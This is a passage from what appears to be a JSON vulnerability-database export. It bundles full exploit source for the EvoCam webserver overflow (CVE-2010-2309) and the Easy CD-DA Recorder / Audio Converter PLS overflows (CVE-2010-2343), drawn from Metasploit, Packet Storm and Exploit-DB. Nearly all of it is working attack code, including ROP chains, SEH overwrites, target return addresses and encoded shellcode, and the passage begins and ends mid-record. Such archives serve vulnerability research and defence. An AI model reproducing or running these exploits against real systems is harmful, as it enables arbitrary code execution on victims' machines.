'javasocket',\n 'Stager' => {'Payload' => ''}\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/java/reverse_tcp.rb"}, {"lastseen": "2019-11-27T05:07:29", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in the web server provided with the EvoCam program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6, 3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerability.\n", "modified": "2017-09-08T01:18:50", "published": "2010-06-09T16:40:48", "id": "MSF:EXPLOIT/OSX/HTTP/EVOCAM_WEBSERVER", "href": "", "type": "metasploit", "title": "MacOS X EvoCam HTTP GET Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MacOS X EvoCam HTTP GET Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the web server provided with the EvoCam\n program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload\n from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6,\n 3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerability.\n },\n 'Author' =>\n [\n 'Paul Harrington', # Original Exploit Author and MSF Module\n 'dookie', # MSF Module Assistance\n ],\n 'Platform' => 'osx',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2010-2309'],\n ['OSVDB', '65043'],\n ['EDB', '12835'],\n ],\n 'Payload' =>\n {\n 'Space' => 300,\n 'BadChars' => \"\\x00\\xff\\x09\\x0a\\x0b\\x0c\\x0c\\x0d\\x20\",\n 'StackAdjustment' => -3500,\n },\n 'Privileged' => false,\n 'Targets' =>\n [\n [ 'Mac OS X 10.5.8 x86, EvoCam 3.6.6',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 1560,\n 'Writable' => 0x8fe66448,\n 'setjmp' => 0x8fe1cf38,\n 'strdup' => 0x8fe210dc,\n 'jmp_eax' => 0x8fe01041\n }\n ],\n [ 'Mac OS X 10.5.8 x86, EvoCam 3.6.7',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 1308,\n 'Writable' => 0x8fe66448,\n 'setjmp' => 0x8fe1cf38,\n 'strdup' => 0x8fe210dc,\n 'jmp_eax' => 0x8fe01041\n }\n ],\n\n ],\n 'DisclosureDate' => 'Jun 01 2010',\n 'DefaultTarget' => 1))\n\n register_options(\n [\n Opt::RPORT(8080),\n ])\n end\n\n def make_exec_payload_from_heap_stub()\n frag0 =\n \"\\x90\" + # nop\n \"\\x58\" + # pop eax\n \"\\x61\" + # popa\n \"\\xc3\" # ret\n\n frag1 =\n \"\\x90\" + # nop\n \"\\x58\" + # pop eax\n \"\\x89\\xe0\" + # mov eax, esp\n \"\\x83\\xc0\\x0e\" + # add eax, byte +0xc\n \"\\x89\\x44\\x24\\x08\" + # mov [esp+0x8], eax\n \"\\xc3\" # ret\n\n setjmp = target['setjmp']\n writable = target['Writable']\n strdup = target['strdup']\n jmp_eax = target['jmp_eax']\n\n exec_payload_from_heap_stub =\n frag0 +\n [setjmp].pack('V') +\n [writable + 32, writable].pack(\"V2\") +\n frag1 +\n \"X\" * 20 +\n [setjmp].pack('V') +\n [writable + 24, writable, strdup, jmp_eax].pack(\"V4\") +\n \"X\" * 4\n end\n\n def exploit\n connect\n\n offset = target['Offset']\n\n buffer = \"GET \"\n buffer << rand_text_alpha_upper(offset)\n buffer << make_exec_payload_from_heap_stub()\n buffer << \"\\x90\\x90\"\n buffer << payload.encoded\n buffer << \" HTTP/1.0\\r\\n\\r\\n\"\n\n sock.put(buffer)\n sock.close\n\n handler()\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/http/evocam_webserver.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:33", "bulletinFamily": "exploit", "description": "", "modified": "2014-02-13T00:00:00", "published": "2014-02-13T00:00:00", "href": "https://packetstormsecurity.com/files/125195/Easy-CD-DA-Recorder-PLS-Buffer-Overflow.html", "id": "PACKETSTORM:125195", "type": "packetstorm", "title": "Easy CD-DA Recorder PLS Buffer Overflow", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack-based buffer overflow vulnerability in \nEasy CD-DA Recorder 2007, caused by a long string in a playlist entry. \nBy persuading the victim to open a specially-crafted .PLS file, a \nremote attacker could execute arbitrary code on the system or cause \nthe application to crash. This module has been tested successfully on \nWindows XP SP3 and Windows 7 SP1. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'chap0', # Vulnerability discovery and original exploit \n'Gabor Seljan', # Metasploit module \n'juan vazquez' # Improved reliability \n], \n'References' => \n[ \n[ 'BID', '40631' ], \n[ 'EDB', '13761' ], \n[ 'OSVDB', '65256' ], \n[ 'CVE', '2010-2343' ], \n[ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ] \n], \n'DefaultOptions' => \n{ \n'ExitFunction' => 'process' \n}, \n'Platform' => 'win', \n'Payload' => \n{ \n'DisableNops' => true, \n'BadChars' => \"\\x0a\\x3d\", \n'Space' => 2454, \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # ADD ESP,-3500 \n}, \n'Targets' => \n[ \n[ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)', \n# easycdda.exe 3.0.114.0 \n# audconv.dll 7.0.815.0 \n{ \n'Offset' => 1108, \n'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll] \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jun 7 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ false, 'The file name.', 'msf.pls']) \n], \nself.class) \n \nend \n \ndef nops \nreturn make_nops(4).unpack(\"V\").first \nend \n \ndef rop_nops(n = 1) \n# RETN (ROP NOP) [audconv.dll] \n[0x1003d55d].pack('V') * n \nend \n \ndef exploit \n \n# ROP chain generated by mona.py - See corelan.be \nrop_gadgets = \n[ \n0x1007261e, # POP EDX # RETN [audconv.dll] \n0x0042a0e0, # &VirtualProtect() [IAT easycdda.exe] \n0x1003bd6b, # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll] \n0x10035802, # XCHG EAX,ESI # RETN [audconv.dll] \n0x1005d288, # POP EBP # RETN [audconv.dll] \n0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe] \n0x1005cc2d, # POP EBX # RETN [audconv.dll] \n0x00000996, # 0x00000996-> EBX \n0x1008740c, # POP EDX # RETN [audconv.dll] \n0x00000040, # 0x00000040-> EDX \n0x1001826d, # POP ECX # RETN [audconv.dll] \n0x004364c6, # &Writable location [easycdda.exe] \n0x00404aa9, # POP EDI # RETN [easycdda.exe] \n0x100378e6, # RETN (ROP NOP) [audconv.dll] \n0x0042527d, # POP EAX # RETN [easycdda.exe] \nnops, \n0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe] \n].flatten.pack('V*') \n \nsploit = rop_nops(target['Offset'] / 4) \nsploit << [0x1003d55c].pack(\"V\") # pop edi # ret [audconv.dll] \nsploit << [target.ret].pack(\"V\") \nsploit << rop_nops(22) \nsploit << rop_gadgets \nsploit << payload.encoded \nsploit << rand_text_alpha_upper(10000) # Generate exception \n \n# Create the file \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \nfile_create(sploit) \n \nend \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125195/easycdda_pls_bof.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T15:08:55", "bulletinFamily": "exploit", "description": "Easy CD-DA Recorder - (PLS File) Buffer Overflow. CVE-2010-2343. Local exploit for windows platform", "modified": "2014-02-13T00:00:00", "published": "2014-02-13T00:00:00", "id": "EDB-ID:31643", "href": "https://www.exploit-db.com/exploits/31643/", "type": "exploitdb", "title": "Easy CD-DA Recorder - PLS File Buffer Overflow", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::FILEFORMAT\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a stack-based buffer overflow vulnerability in\r\n Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.\r\n By persuading the victim to open a specially-crafted .PLS file, a\r\n remote attacker could execute arbitrary code on the system or cause\r\n the application to crash. This module has been tested successfully on\r\n Windows XP SP3 and Windows 7 SP1.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'chap0', # Vulnerability discovery and original exploit\r\n 'Gabor Seljan', # Metasploit module\r\n 'juan vazquez' # Improved reliability\r\n ],\r\n 'References' =>\r\n [\r\n [ 'BID', '40631' ],\r\n [ 'EDB', '13761' ],\r\n [ 'OSVDB', '65256' ],\r\n [ 'CVE', '2010-2343' ],\r\n [ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => 'process'\r\n },\r\n 'Platform' => 'win',\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'BadChars' => \"\\x0a\\x3d\",\r\n 'Space' => 2454,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # ADD ESP,-3500\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',\r\n # easycdda.exe 3.0.114.0\r\n # audconv.dll 7.0.815.0\r\n {\r\n 'Offset' => 1108,\r\n 'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jun 7 2010',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls'])\r\n ],\r\n self.class)\r\n\r\n end\r\n\r\n def nops\r\n return make_nops(4).unpack(\"V\").first\r\n end\r\n\r\n def rop_nops(n = 1)\r\n # RETN (ROP NOP) [audconv.dll]\r\n [0x1003d55d].pack('V') * n\r\n end\r\n\r\n def exploit\r\n\r\n # ROP chain generated by mona.py - See corelan.be\r\n rop_gadgets =\r\n [\r\n 0x1007261e, # POP EDX # RETN [audconv.dll]\r\n 0x0042a0e0, # &VirtualProtect() [IAT easycdda.exe]\r\n 0x1003bd6b, # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll]\r\n 0x10035802, # XCHG EAX,ESI # RETN [audconv.dll]\r\n 0x1005d288, # POP EBP # RETN [audconv.dll]\r\n 0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe]\r\n 0x1005cc2d, # POP EBX # RETN [audconv.dll]\r\n 0x00000996, # 0x00000996-> EBX\r\n 0x1008740c, # POP EDX # RETN [audconv.dll]\r\n 0x00000040, # 0x00000040-> EDX\r\n 0x1001826d, # POP ECX # RETN [audconv.dll]\r\n 0x004364c6, # &Writable location [easycdda.exe]\r\n 0x00404aa9, # POP EDI # RETN [easycdda.exe]\r\n 0x100378e6, # RETN (ROP NOP) [audconv.dll]\r\n 0x0042527d, # POP EAX # RETN [easycdda.exe]\r\n nops,\r\n 0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]\r\n ].flatten.pack('V*')\r\n\r\n sploit = rop_nops(target['Offset'] / 4)\r\n sploit << [0x1003d55c].pack(\"V\") # pop edi # ret [audconv.dll]\r\n sploit << [target.ret].pack(\"V\")\r\n sploit << rop_nops(22)\r\n sploit << rop_gadgets\r\n sploit << payload.encoded\r\n sploit << rand_text_alpha_upper(10000) # Generate exception\r\n\r\n # Create the file\r\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n file_create(sploit)\r\n\r\n end\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/31643/"}, {"lastseen": "2016-02-01T18:25:48", "bulletinFamily": "exploit", "description": "Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ROP/WPM. CVE-2010-2343. Local exploit for windows platform", "modified": "2010-06-07T00:00:00", "published": "2010-06-07T00:00:00", "id": "EDB-ID:13763", "href": "https://www.exploit-db.com/exploits/13763/", "type": "exploitdb", "title": "Audio Converter 8.1 - Stack Buffer Overflow PoC Exploit ROP/WPM 0day", "sourceData": "#***********************************************************************************\r\n# Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ROP/WPM\r\n# Date : 07/06/2010\r\n# Author : Sud0\r\n# Bug found by : chap0\r\n# Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html\r\n# Version : 8.1\r\n# OS : Windows\r\n# Tested on : XP SP3 En (VirtualBox)\r\n# Type of vuln : SEH\r\n# Thanks to my wife for her support\r\n# Thanks for chap0 for bringing us the game\r\n# Greetz to: Corelan Security Team\r\n# mr_me you'r killing the ROP bro :)\r\n# http://www.corelan.be:8800/index.php/security/corelan-team-members/\r\n# Using ROP to bypass DEP protection and call WPM\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n# Script provided 'as is', without any warranty.\r\n# Use for educational purposes only.\r\n# Do not use this code to do anything illegal !\r\n# Corelan does not want anyone to use this script\r\n# for malicious and/or illegal purposes\r\n# Corelan cannot be held responsible for any illegal use.\r\n#\r\n# Note : you are not allowed to edit/modify this code. \r\n# If you do, Corelan cannot be held responsible for any damages this may cause.\r\n#***********************************************************************************\r\n#code :\r\nprint \"|------------------------------------------------------------------|\\n\";\r\nprint \"| __ __ |\\n\";\r\nprint \"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\\n\";\r\nprint \"| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |\\n\";\r\nprint \"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\\n\";\r\nprint \"| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |\\n\";\r\nprint \"| |\\n\";\r\nprint \"| http://www.corelan.be:8800 |\\n\";\r\nprint \"| |\\n\";\r\nprint \"|-------------------------------------------------[ EIP Hunters ]--|\\n\\n\";\r\nprint \"[+] Exploit for .... \\n\";\r\n\r\nmy $filename=\"newaudio.pls\";\r\n# Small Shellcode to run calc\r\nmy $shellcode = \"\\x8B\\xEC\\x55\\x8B\\xEC\\x68\\x20\\x20\\x20\\x2F\\x68\\x63\\x61\\x6C\\x63\\x8D\\x45\\xF8\\x50\\xB8\\xC7\\x93\\xC2\\x77\\xFF\\xD0\";\r\n\r\nmy \t$buffer = \"A\" x 280; \t\t\t# some junk\r\n\t$buffer .= \"\\x31\\x2A\\x00\\x10\"; \t\t# mov eax,ebp / pop ebp / retn4\r\n\t$buffer .= \"B\" x 12; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t# add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 8;\t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t\r\n\t$buffer .= \"\\x00\\x8D\\x00\\x10\"; \t\t# POP EDI / RETN\r\n\t$buffer .= \"\\xB6\\x12\\x00\\x10\"; \t\t# ADD ESP,4 / RETN\r\n\t$buffer .= \"\\x05\\x21\\x00\\x10\"; \t\t# ADD ESP,14 / RETN\r\n\t$buffer .= \"B\" x 20 ; \t\t\t# some junk\r\n\t\r\n\t$buffer .= \"\\x79\\x84\\x02\\x10\"; \t\t# mov dword ptr ss:[esp + 10], eax / call EDI\r\n\t$buffer .= \"\\x13\\x22\\x80\\x7C\"; \t\t# @ of WPM\r\n\t$buffer .= \"\\xFF\\xFF\\xFF\\xFF\"; \t\t# RET after WPM choose one and use it\r\n\t$buffer .= \"\\xFF\\xFF\\xFF\\xFF\"; \t\t# -1 : means process itself\r\n\t$buffer .= \"\\xCF\\x22\\x80\\x7C\"; \t\t# Destination address\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk, @ of shellcode will land here\r\n\t$buffer .= \"\\x1A\\x00\\x00\\x00\"; \t\t# size of shellcode \r\n\t$buffer .= \"\\x00\\xA0\\x45\\x00\"; \t\t# Writeable memory \r\n\t$buffer .= \"B\" x 12;\t\t\t# some junk\r\n\t$buffer .= $shellcode;\r\n\r\n\t$buffer .= \"B\" x (4436 -length($buffer)); \t\t# some junk\r\n\t$buffer .= \"\\x2F\\x37\\x01\\x10\"; \t\t# SEH : add esp, 878 / retn 8\r\n\t$buffer .= \"A\" x 10000;\t\t\t# some junk\r\n\r\nprint \"Removing old $filename file\\n\";\r\nsystem(\"del $filename\");\r\nprint \"Creating new $filename file\\n\";\r\nopen(FILE, \">$filename\");\r\n\r\nprint FILE $buffer;\r\nclose(FILE);\r\n\r\n\r\n\r\n\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/13763/"}, {"lastseen": "2016-02-01T18:25:34", "bulletinFamily": "exploit", "description": "Easy CD-DA Recorder 2007 SEH Buffer Overflow. CVE-2010-2343. Local exploit for windows platform", "modified": "2010-06-07T00:00:00", "published": "2010-06-07T00:00:00", "id": "EDB-ID:13761", "href": "https://www.exploit-db.com/exploits/13761/", "type": "exploitdb", "title": "Easy CD-DA Recorder 2007 SEH Buffer Overflow", "sourceData": "# Exploit Title : Easy CD-DA Recorder 2007 SEH Buffer Overflow \r\n# Date : June 7, 2010\r\n# Author : chap0 [http://www.seek-truth.net]\r\n# Software Link : http://download.cnet.com/Easy-CD-DA-Recorder/3000-2646_4-10059726.html\r\n# Tested on : Windows XP SP3 En\r\n# Type of vuln : SEH\r\n# Greetz to : Corelan Security Team\r\n# The Crew\t\t: http://www.corelan.be:8800/index.php/security/corelan-team-members/\r\n# Advisory\t\t: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048\r\n# --------------------------------------------------------------------------------------\r\n# Script provided 'as is', without any warranty.\r\n# Use for educational purposes only.\r\n# Do not use this code to do anything illegal !\r\n# Corelan does not want anyone to use this script\r\n# for malicious and/or illegal purposes\r\n# Corelan cannot be held responsible for any illegal use.\r\n#\r\n# Note : you are not allowed to edit/modify this code. \r\n# If you do, Corelan cannot be held responsible for any damages this may cause.\r\n#\r\n# Code :\r\nprint \"|------------------------------------------------------------------|\\n\";\r\nprint \"| __ __ |\\n\";\r\nprint \"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\\n\";\r\nprint \"| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |\\n\";\r\nprint \"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\\n\";\r\nprint \"| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |\\n\";\r\nprint \"| |\\n\";\r\nprint \"| http://www.corelan.be:8800 |\\n\";\r\nprint \"| |\\n\";\r\nprint \"|-------------------------------------------------[ EIP Hunters ]--|\\n\\n\";\r\nprint \"[+] Exploit for Easy CD-DA Recorder \\n\";\r\nprint \"[+] Preparing payload\\n\";\r\nsleep(1);\r\nmy $junk=\"\\x41\" x 1108;\r\n\r\nmy $nseh=\"\\xeb\\x06\\x90\\x90\";\r\n\r\nmy $seh= \"\\x70\\x80\\x08\\x10\"; # ppr 0x10088070 [audconv.dll] \r\n\r\nmy $nops=\"\\x90\" x 24;\r\n\r\nmy $shellcode=\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x54\".\r\n\"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x38\\x45\\x44\\x4e\\x53\\x4b\\x48\\x4e\\x47\".\r\n\"\\x45\\x50\\x4a\\x37\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x44\\x4a\\x51\\x4b\\x38\".\r\n\"\\x4f\\x35\\x42\\x42\\x41\\x50\\x4b\\x4e\\x49\\x54\\x4b\\x38\\x46\\x43\\x4b\\x38\".\r\n\"\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x38\\x42\\x4c\".\r\n\"\\x46\\x47\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\\x44\\x4c\\x4b\\x4e\".\r\n\"\\x46\\x4f\\x4b\\x43\\x46\\x35\\x46\\x42\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x38\".\r\n\"\\x4f\\x45\\x46\\x52\\x41\\x30\\x4b\\x4e\\x48\\x36\\x4b\\x58\\x4e\\x50\\x4b\\x34\".\r\n\"\\x4b\\x58\\x4f\\x35\\x4e\\x51\\x41\\x50\\x4b\\x4e\\x4b\\x38\\x4e\\x31\\x4b\\x48\".\r\n\"\\x41\\x30\\x4b\\x4e\\x49\\x38\\x4e\\x45\\x46\\x32\\x46\\x50\\x43\\x4c\\x41\\x43\".\r\n\"\\x42\\x4c\\x46\\x56\\x4b\\x38\\x42\\x54\\x42\\x53\\x45\\x38\\x42\\x4c\\x4a\\x47\".\r\n\"\\x4e\\x30\\x4b\\x58\\x42\\x34\\x4e\\x30\\x4b\\x38\\x42\\x57\\x4e\\x51\\x4d\\x4a\".\r\n\"\\x4b\\x48\\x4a\\x36\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x48\\x42\\x58\\x42\\x4b\".\r\n\"\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x38\\x4a\\x46\\x4e\\x53\\x4f\\x35\\x41\\x53\".\r\n\"\\x48\\x4f\\x42\\x56\\x48\\x55\\x49\\x48\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x37\".\r\n\"\\x42\\x45\\x4a\\x46\\x42\\x4f\\x4c\\x48\\x46\\x30\\x4f\\x55\\x4a\\x46\\x4a\\x39\".\r\n\"\\x50\\x4f\\x4c\\x48\\x50\\x50\\x47\\x35\\x4f\\x4f\\x47\\x4e\\x43\\x56\\x41\\x56\".\r\n\"\\x4e\\x46\\x43\\x46\\x42\\x30\\x5a\";\r\n\r\n$padding = \"\\x41\" x 10000;\r\n\r\nmy $payload = $junk.$nseh.$seh.$nops.$shellcode.$padding;\r\n\r\nopen (myfile, '>easy.pls');\r\n\r\nprint myfile $payload;\r\n\r\nclose (myfile);\r\n\r\nprint \"[+] Storm the Gates of Hell\\n\"", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/13761/"}, {"lastseen": "2016-02-01T18:25:24", "bulletinFamily": "exploit", "description": "Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit. CVE-2010-2343. Local exploit for windows platform", "modified": "2010-06-07T00:00:00", "published": "2010-06-07T00:00:00", "id": "EDB-ID:13760", "href": "https://www.exploit-db.com/exploits/13760/", "type": "exploitdb", "title": "Audio Converter 8.1 - Stack Buffer Overflow PoC Exploit 0day", "sourceData": "#***********************************************************************************\r\n# Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit\r\n# Date : 16/05/2010\r\n# Author : Sud0\r\n# Bug found by : chap0\r\n# Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html\r\n# Version : 8.1\r\n# OS : Windows\r\n# Tested on : XP SP3 En (VirtualBox)\r\n# Type of vuln : SEH\r\n# Thanks to my wife for her support\r\n# Thanks for chap0 for bringing us the game\r\n# Greetz to: Corelan Security Team\r\n# http://www.corelan.be:8800/index.php/security/corelan-team-members/\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n# Script provided 'as is', without any warranty.\r\n# Use for educational purposes only.\r\n# Do not use this code to do anything illegal !\r\n# Corelan does not want anyone to use this script\r\n# for malicious and/or illegal purposes\r\n# Corelan cannot be held responsible for any illegal use.\r\n#\r\n# Note : you are not allowed to edit/modify this code. \r\n# If you do, Corelan cannot be held responsible for any damages this may cause.\r\n#***********************************************************************************\r\n#code :\r\nprint \"|------------------------------------------------------------------|\\n\";\r\nprint \"| __ __ |\\n\";\r\nprint \"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\\n\";\r\nprint \"| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |\\n\";\r\nprint \"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\\n\";\r\nprint \"| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |\\n\";\r\nprint \"| |\\n\";\r\nprint \"| http://www.corelan.be:8800 |\\n\";\r\nprint \"| |\\n\";\r\nprint \"|-------------------------------------------------[ EIP Hunters ]--|\\n\\n\";\r\nprint \"[+] Exploit for .... \\n\";\r\n\r\nimport socket\r\n#shellcode running calc.exe alpha2 encoded basereg edx\r\nshell=\"JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIlKXlpUnkxlqx7P7PQ0fOrHpcparLQsLMaUzXPPNXKwOcxBCGKOZpA\" \r\njunk=\"B\" * (4432 - len(shell)) #seh overwritten after 4432 bytes\r\nnseh= \"\\xEB\\x06\\xEB\\x06\" # jmp forward \r\nseh= \"\\xF1\\x8E\\x03\\x10\" # nice ppr from audioconv\r\nalign=\"\\x61\\x61\\x61\\xff\\xE2\" # popad / popad / popad / jmp edx\r\nbuffer= shell + junk + nseh + seh + \"\\x90\" * 20 + align + \"A\"* 10000# added some nops after seh\r\n \r\nmefile = open('poc.pls','w');\r\nmefile.write(buffer);\r\nmefile.close()\r\n", "cvss": {"score": 9.3, "vector": 